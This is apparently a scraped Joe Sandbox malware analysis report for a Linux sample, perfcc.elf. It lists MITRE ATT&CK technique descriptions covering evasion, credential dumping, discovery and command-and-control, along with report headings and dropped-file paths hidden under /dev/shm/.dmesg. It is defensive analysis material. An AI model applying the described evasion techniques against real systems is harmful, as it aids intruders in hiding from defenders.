Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report perfcc.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/dev/shm/.dmesg/ino/10385

/dev/shm/.dmesg/ino/74797

/dev/shm/.dmesg/pds/6269

/dev/shm/.dmesg/pds/6311

/dev/shm/.dmesg/pds/6374

/dev/shm/.dmesg/pds/6375

/dev/shm/.dmesg/pds/6379

/dev/shm/.dmesg/pds/6380

/dev/shm/.dmesg/pds/6429

/dev/shm/.dmesg/pds/6434

/dev/shm/.dmesg/pds/6472

/dev/shm/.dmesg/pds/6491

/dev/shm/.dmesg/pds/6517

/dev/shm/.dmesg/pds/6555

/dev/shm/.dmesg/pds/6620

/dev/shm/.dmesg/pds/6630

/dev/shm/.dmesg/pds/6631

/dev/shm/.dmesg/pds/6632

/dev/shm/.dmesg/pds/6633

/dev/shm/.dmesg/pds/6634

/dev/shm/.dmesg/pds/6635

/dev/shm/.dmesg/pds/6670

/dev/shm/.dmesg/pds/6671

/dev/shm/.dmesg/pds/6684

/dev/shm/.dmesg/pds/6689

/dev/shm/.dmesg/pds/6690

/dev/shm/.dmesg/pds/6693

Linux Analysis Report
perfcc.elf

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre